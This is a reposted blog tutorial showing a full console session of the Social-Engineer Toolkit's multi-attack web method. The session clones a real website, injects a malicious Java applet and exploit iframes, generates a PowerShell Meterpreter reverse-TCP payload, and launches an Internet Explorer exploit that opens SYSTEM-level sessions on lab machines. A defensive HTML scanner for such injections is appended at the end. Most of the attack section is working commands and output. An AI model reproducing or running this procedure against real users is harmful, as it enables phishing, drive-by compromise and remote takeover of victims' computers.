Web Multi-Attack Vector Penetration Testing: The SET Toolkit

Using the SET toolkit to run a multi-attack. The attack methods included in this example are the Java Applet attack, the Metasploit client-side (browser) exploit, and the web jacking attack.


The detailed procedure follows (it is fairly long, so please read it patiently).

Run setoolkit to enter the SET toolkit:


         01011001011011110111010100100000011100
         10011001010110000101101100011011000111
         10010010000001101000011000010111011001
         10010100100000011101000110111100100000
         01101101011101010110001101101000001000
         00011101000110100101101101011001010010
         00000110111101101110001000000111100101
         10111101110101011100100010000001101000
         01100001011011100110010001110011001000
         00001110100010110100101001001000000101
         01000110100001100001011011100110101101
         11001100100000011001100110111101110010
         00100000011101010111001101101001011011
         10011001110010000001110100011010000110
         01010010000001010011011011110110001101
         10100101100001011011000010110101000101
         01101110011001110110100101101110011001
         01011001010111001000100000010101000110
         11110110111101101100011010110110100101
         11010000100000001010100110100001110101
         011001110111001100101010

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
                                                                                                                                                       

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.


set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu


set:webattack>6
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]: 
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com

Select which attacks you want to use:

   1. Java Applet Attack Method (OFF)
   2. Metasploit Browser Exploit Method (OFF)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Web Jacking Attack Method (OFF)
   6. Use them all - A.K.A. 'Tactical Nuke'
   7. I'm finished and want to proceed with the attack

  99. Return to Main Menu

set:webattack:multiattack> Enter selections one at a time (7 to finish):1
[-] Turning the Java Applet Attack Vector to ON
[*] Option added. You may select additional vectors

Select which additional attacks you want to use:

   1. Java Applet Attack Method (ON)
   2. Metasploit Browser Exploit Method (OFF)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Web Jacking Attack Method (OFF)
   6. Use them all - A.K.A. 'Tactical Nuke'
   7. I'm finished and want to proceed with the attack

  99. Return to Main Menu

set:webattack:multiattack> Enter selections one at a time (7 to finish):2
[-] Turning the Metasploit Client Side Attack Vector to ON
[*] Option added. You may select additional vectors

Select which additional attacks you want to use:

   1. Java Applet Attack Method (ON)
   2. Metasploit Browser Exploit Method (ON)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Web Jacking Attack Method (OFF)
   6. Use them all - A.K.A. 'Tactical Nuke'
   7. I'm finished and want to proceed with the attack

  99. Return to Main Menu

set:webattack:multiattack> Enter selections one at a time (7 to finish):5
[-] Turning the Web Jacking Attack Vector to ON
[*] Option added. You may select additional vectors

Select which additional attacks you want to use:

   1. Java Applet Attack Method (ON)
   2. Metasploit Browser Exploit Method (ON)
   3. Credential Harvester Attack Method (ON)
   4. Tabnabbing Attack Method (OFF)
   5. Web Jacking Attack Method (ON)
   6. Use them all - A.K.A. 'Tactical Nuke'
   7. I'm finished and want to proceed with the attack

  99. Return to Main Menu

set:webattack:multiattack> Enter selections one at a time (7 to finish):

[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: zprRppE
[*] Malicious java applet website prepped for deployment

[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.


What payload do you want to generate:

  Name:                                       Description:

   1) Meterpreter Memory Injection (DEFAULT)  This will drop a meterpreter payload through powershell injection
   2) Meterpreter Multi-Memory Injection      This will drop multiple Metasploit payloads via powershell injection
   3) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
   4) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
   5) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
   6) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec
   7) Import your own executable              Specify a path for your own executable
   8) Import your own commands.txt            Specify payloads to be sent via command line

set:payloads>1
set:payloads> PORT of the listener [443]:

Select the payload you want to deliver via shellcode injection

   1) Windows Meterpreter Reverse TCP
   2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
   4) Windows Meterpreter (ALL PORTS) Reverse TCP

set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...

[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.

Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(

 Enter the browser exploit you would like to use [8]:

   1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
   2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
   3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
   4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
   5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
   6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
   7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
   8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
   9) Java Applet JMX Remote Code Execution (2013-01-10)
  10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
  11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
  12) Java 7 Applet Remote Code Execution (2012-08-26)
  13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
  14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
  15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
  16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
  17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
  18) Adobe Flash Player Object Type Confusion  (2012-05-04)
  19) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
  20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
  21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
  22) MS11-050 IE mshtml!CObjectElement Use After Free  (2011-06-16)
  23) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
  24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
  25) Internet Explorer CSS Import Use After Free (2010-11-29)
  26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
  27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
  28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
  29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
  30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
  31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
  32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
  33) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
  34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
  35) Microsoft Help Center XSS and Command Execution (2010-06-09)
  36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  37) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
  39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
  40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
  41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
  42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
  43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
  44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
  45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
  46) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>39
[!] ERROR:Something is running on port 80. Attempting to see if we can stop Apache...
[!] Apache may be running, do you want SET to stop the process? [y/n]: [*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[*] Attempting to stop apache.. One moment..
Stopping apache2 (via systemctl): apache2.service.
[*] Success! Apache was stopped. Moving forward within SET...
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[!] The following modules could not be loaded!..\
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````````````````````
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````-mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.0.43-dev                          ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use windows/browser/ms09_002_memory_corruption
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.1.113
LHOST => 192.168.1.113
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set//meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.113:443 
msf6 exploit(windows/browser/ms09_002_memory_corruption) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.113:8080/
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Session ID 1 (192.168.1.113:443 -> 192.168.1.115:1464) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is notepad.exe (2432) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (772)
[*] 192.168.1.115    ms09_002_memory_corruption - Sending MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[+] Successfully migrated to services.exe (772) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1464) at 2021-06-22 21:19:00 +0800
[*] Sending stage (175174 bytes) to 192.168.1.114

Have the target machine visit ports 443 and 8080 on 192.168.1.113 (the testing host's IP); the sessions will then appear on the testing host. The remaining steps are not elaborated further here.
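As an added defensive example (not part of the original post and not SET's own code), the script below inspects an HTML page for the two injections the transcript reports, the Java applet and the iframes that point at the Metasploit browser-exploit server, and lists what it finds. The sample HTML is constructed for illustration; the tag and attribute heuristics (off-origin iframe host, non-standard port, hidden or zero-size frame, any applet/object/embed element) are my own assumptions about how such injections usually look, not SET's actual template.

```python
"""Added defensive example: flag injected Java applets and suspicious iframes in a page.

Not part of the original post or of SET. The sample HTML at the bottom is constructed;
the heuristics are assumptions, not derived from SET's templates.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Collect <applet>/<object>/<embed> and <iframe> elements with their attributes."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("applet", "object", "embed"):
            self.applets.append((tag, attrs))
        elif tag == "iframe":
            self.iframes.append(attrs)


def _is_hidden(attrs):
    """True for frames that are zero/one pixel in size or hidden via inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "") in ("0", "1") or attrs.get("height", "") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def scan_page(html, page_origin):
    """Return a list of findings for `html`, judged against the page's own origin.

    `page_origin` is a 'scheme://host[:port]' string for the URL the page was served from.
    """
    parser = InjectionScanner()
    parser.feed(html)
    origin = urlparse(page_origin)
    findings = []

    for tag, attrs in parser.applets:
        # A Java plugin element on a page that should not carry one is a strong indicator.
        ref = attrs.get("code") or attrs.get("archive") or attrs.get("data") or attrs.get("src") or ""
        findings.append(f"java-plugin content: <{tag}> referencing '{ref}'")

    for attrs in parser.iframes:
        src = attrs.get("src", "")
        target = urlparse(src)
        reasons = []
        if target.netloc and target.hostname != origin.hostname:
            reasons.append("off-origin host")
        if target.port not in (None, 80, 443):
            reasons.append(f"non-standard port {target.port}")
        if _is_hidden(attrs):
            reasons.append("hidden/zero-size")
        if reasons:
            findings.append(f"suspicious iframe src='{src}': " + ", ".join(reasons))
    return findings


# Constructed sample: a cloned page into which an applet and a hidden iframe were inserted.
# The iframe target mirrors the transcript, where the MSF server listens on 192.168.1.113:8080.
SAMPLE_HTML = """<html><head><title>Search</title></head><body>
<div id="wrapper">normal page content</div>
<applet code="Java.class" archive="payload.jar" width="1" height="1"></applet>
<iframe src="http://192.168.1.113:8080/" width="0" height="0" style="display:none"></iframe>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, "http://www.example.com"):
        print(finding)
```

Run it as-is and it reports the applet and the hidden iframe but not the same-origin, normally sized widget frame. The "off-origin host" and "non-standard port" checks are what catch the pattern from this walkthrough: the cloned page claims to be one site while a frame quietly loads content from a different host and port.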


This article has described in detail how to carry out a multi-attack with the SET toolkit; it is for learning purposes only.


Reposted from blog.csdn.net/qq_19623861/article/details/118117928